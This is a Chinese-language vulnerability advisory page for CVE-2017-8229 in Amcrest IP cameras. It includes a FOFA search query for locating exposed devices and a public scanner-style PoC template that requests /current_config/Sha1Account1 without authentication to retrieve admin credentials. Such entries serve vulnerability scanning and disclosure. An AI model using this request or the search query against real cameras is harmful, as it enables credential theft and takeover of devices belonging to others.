CVE-2017-8229: Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞

日期: 2025-08-01 | 影响软件: Amcrest IP Camera Web | POC: 已公开

漏洞描述

Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头,设备允许未经身份验证的攻击者下载管理凭据 fofa: "Amcrest"

PoC代码[已公开]

id: CVE-2017-8229

info:
  name: Amcrest IP Camera Web Sha1Account1 账号密码泄漏漏洞
  author: zan8in
  severity: critical
  description: |-
    Amcrest IP Camera Web是Amcrest公司的一款无线IP摄像头,设备允许未经身份验证的攻击者下载管理凭据
    fofa: "Amcrest"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-8229
  tags: cve,cve2017,amcrest,info
  created: 2023/07/13

rules:
  r0:
    request:
      method: GET
      path: /current_config/Sha1Account1
    expression: response.status == 200 && response.body.bcontains(b'"DevInformation" :') && response.body.bcontains(b'"SerialID" :') && response.body.bcontains(b'"AuthorityList" :')
expression: r0()

相关漏洞推荐